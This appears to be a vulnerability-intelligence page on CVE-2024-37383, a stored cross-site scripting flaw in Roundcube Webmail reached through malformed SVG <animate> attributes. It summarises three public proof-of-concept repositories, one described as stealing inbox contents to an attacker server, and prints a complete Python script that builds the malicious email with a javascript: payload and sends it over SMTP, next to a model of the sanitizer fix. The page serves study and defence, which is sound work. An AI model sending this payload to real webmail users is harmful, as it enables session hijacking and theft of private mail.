Stored XSS in Roundcube Webmail via SVG animate attributes
CVE-2024-37383 is a stored cross-site scripting vulnerability in Roundcube Webmail caused by improper sanitisation of SVG <animate> attributes in HTML email content. It affects Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7. A remote attacker sends a crafted email whose HTML part contains an SVG with an <animate> element; a malformed attributeName (the public PoCs use "href " with a trailing space) slips past the sanitizer's attribute check while the browser still honours it, so a javascript: URL in the animation values runs when the victim opens the message in Roundcube. Reporting on in-the-wild exploitation indicates the payload can sit in content the client processes but does not visibly render, giving stealthy execution in the security context of the victim's Roundcube session, from which the attacker can read mail and call the webmail API as the victim.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
Repository is a small PoC/lab for CVE-2024-37383 (Roundcube Webmail SVG parsing XSS). Structure: (1) docker-compose.yml spins up a vulnerable Roundcube instance (roundcube/roundcubemail:1.6.6-apache) and a GreenMail standalone server providing SMTP/IMAP and a web UI. Roundcube is exposed on host port 8080; GreenMail exposes 3000 (web/API), 3143 (IMAP), 3025 (SMTP). (2) send.py is the exploit driver: it connects to SMTP at localhost:3025 and sends an email from/to test@example.com containing a multipart message with a crafted HTML part. The HTML embeds an <svg> with an <animate> element using a malformed attributeName ("href ", trailing space) and a javascript: URL in values, intended to trigger XSS when the email is viewed in Roundcube. README.md documents affected versions (before 1.5.7 and 1.6.x before 1.6.7), setup steps, and links to an analysis report. Overall purpose: provide a reproducible local environment and a minimal script to deliver the malicious email demonstrating the XSS.
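The following is an added example written for this page; it is not code from the page or from any of the repositories listed here. It builds the kind of multipart message the PoC drivers deliver (an HTML part carrying an invisible SVG whose <animate> retargets an <a> href to a javascript: URL) and, alongside it, a deliberately simplified model of the sanitizer comparison the bug slipped past: comparing the raw attributeName value against a list of URL-bearing attribute names lets "href " (trailing space) through, whereas trimming and lower-casing the value first rejects it. Assumptions, labelled in the code: the sanitizer model is this example's own simplification and is not Roundcube's washtml implementation; the SMTP host/port and the test@example.com addresses are the lab values described above; the alert payload is a placeholder.

```python
"""Added example for CVE-2024-37383 (not the page's or any repo's code).

Builds the crafted message and models the sanitizer check on <animate>.
The sanitizer model is a simplification for this example, NOT Roundcube's
rcube_washtml code.  Lab SMTP values are the ones from the docker lab
described above (assumption: GreenMail on localhost:3025).
"""
import smtplib
from email.message import EmailMessage
from html.parser import HTMLParser

# Attribute names that must not be the target of an <animate> because the
# animated value becomes a URL the browser will follow (set chosen for this
# example; a real sanitizer's list is larger).
URL_ATTRS = {"href", "xlink:href"}


def make_payload(attr_name: str = "href ", js: str = "alert(document.domain)") -> str:
    """HTML part with a blank SVG: <animate> retargets the parent <a>'s
    href to a javascript: URL.  attr_name defaults to the malformed value
    the PoCs use, 'href' followed by a space.  Nothing visible is drawn."""
    return (
        "<html><body>"
        f'<svg><a><animate attributeName="{attr_name}" '
        f'values="javascript:{js}" begin="0s" dur="1s" fill="freeze"/>'
        "</a></svg>"
        "</body></html>"
    )


def animate_allowed(attrs: dict, normalise: bool) -> bool:
    """Model of a sanitizer's decision for one <animate> element.
    Returns True if the element would be kept.
    normalise=False: compare the raw attributeName value (vulnerable: a
    trailing space makes 'href ' miss the blocklist).
    normalise=True: strip and lower-case first (hardened)."""
    name = attrs.get("attributename", "")
    if normalise:
        name = name.strip().lower()
    return name not in URL_ATTRS


class AnimateScan(HTMLParser):
    """Walks an HTML document and classifies every <animate> element.
    HTMLParser lower-cases tag and attribute *names* but leaves attribute
    *values* untouched, so 'href ' keeps its trailing space."""

    def __init__(self, normalise: bool):
        super().__init__()
        self.normalise = normalise
        self.kept, self.dropped = [], []

    def handle_starttag(self, tag, attrs):  # also reached for <animate .../>
        if tag == "animate":
            d = {k: (v or "") for k, v in attrs}
            (self.kept if animate_allowed(d, self.normalise) else self.dropped).append(d)


def scan(html: str, normalise: bool) -> tuple:
    """Return (kept, dropped) counts of <animate> elements under the model."""
    p = AnimateScan(normalise)
    p.feed(html)
    p.close()
    return len(p.kept), len(p.dropped)


def build_message(sender: str, recipient: str, html: str) -> EmailMessage:
    """multipart/alternative message: a text part plus the crafted HTML part,
    the same shape the PoC drivers send."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "CVE-2024-37383 lab message"
    msg.set_content("This message has an HTML part.")
    msg.add_alternative(html, subtype="html")
    return msg


def html_part_text(msg: EmailMessage) -> str:
    """Decoded HTML body (transfer encoding stripped), for inspection."""
    return msg.get_body(preferencelist=("html",)).get_content()


def send(msg: EmailMessage, host: str = "localhost", port: int = 3025) -> None:
    """Deliver to the lab's GreenMail SMTP listener (assumed from the lab setup)."""
    with smtplib.SMTP(host, port) as s:
        s.send_message(msg)


if __name__ == "__main__":
    html = make_payload()
    print("raw-compare sanitizer (kept, dropped):", scan(html, normalise=False))
    print("trim+lower sanitizer  (kept, dropped):", scan(html, normalise=True))
    send(build_message("test@example.com", "test@example.com", html))
```

Running the module against the lab delivers the message; the two scan lines show the same payload surviving the raw comparison and being dropped once the attribute name is normalised before the check, which is the one-line class of fix that closes this bypass. Only run the send step against a lab instance you own.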
This repository contains an operational exploit for CVE-2024-37383, a stored XSS vulnerability in Roundcube Webmail (versions before 1.5.7 and 1.6.x before 1.6.7). The exploit consists of a JavaScript file ('Roundcube_mail_server_exploit_for_CVE-2024-37383.js') and a detailed README. The JavaScript payload is designed to be injected via a crafted email (e.g., using an SVG <animate> tag) and, when executed in the victim's browser, enumerates all inbox messages, extracts their subjects and contents, and sends them to an attacker-controlled server via POST requests. The README provides step-by-step instructions for configuring the exploit, including setting the target Roundcube instance and the attacker's server endpoint. The exploit is a standalone script, not part of a framework. The main attack vector is browser-based XSS, requiring the victim to open a malicious email in a vulnerable Roundcube instance. The repository is well structured, with clear separation between documentation and exploit code.
This repository is a proof-of-concept (POC) exploit for CVE-2024-37383, a stored XSS vulnerability in Roundcube Webmail. The repository contains three files: a README.md with usage instructions, exploit.py (the main exploit script), and start_roudcube.sh (a helper script to launch a local Roundcube instance via Docker). The exploit works by sending a specially crafted HTML email containing an SVG element with an <animate> tag that, when clicked by the victim in the Roundcube webmail interface, triggers a JavaScript alert. The exploit.py script allows the attacker to specify sender and recipient email addresses, SMTP host, and port, making it flexible for different email providers. The start_roudcube.sh script sets up a vulnerable Roundcube instance for testing, using GMX as the default mail provider. The main attack vector is network-based (sending email) and browser-based (victim interaction with the webmail UI). The exploit demonstrates the vulnerability but requires user interaction (clicking the link) to trigger the XSS payload.
Recent activity
10 sources tracked across advisories, community write-ups, and news.
Roundcube webmail vulnerability exploited in campaigns.
A cross-site scripting (XSS) vulnerability in Roundcube and Zimbra webmail platforms, exploited for zero-click attacks by APT28.
A cross-site scripting (XSS) vulnerability in Roundcube webmail that was reportedly weaponized to enable zero-click style attacks leading to credential and email data theft via injected malicious code and abuse of the webmail API.
A Roundcube vulnerability referenced as added to CISA KEV for exploitation activity (no additional technical details provided in the content).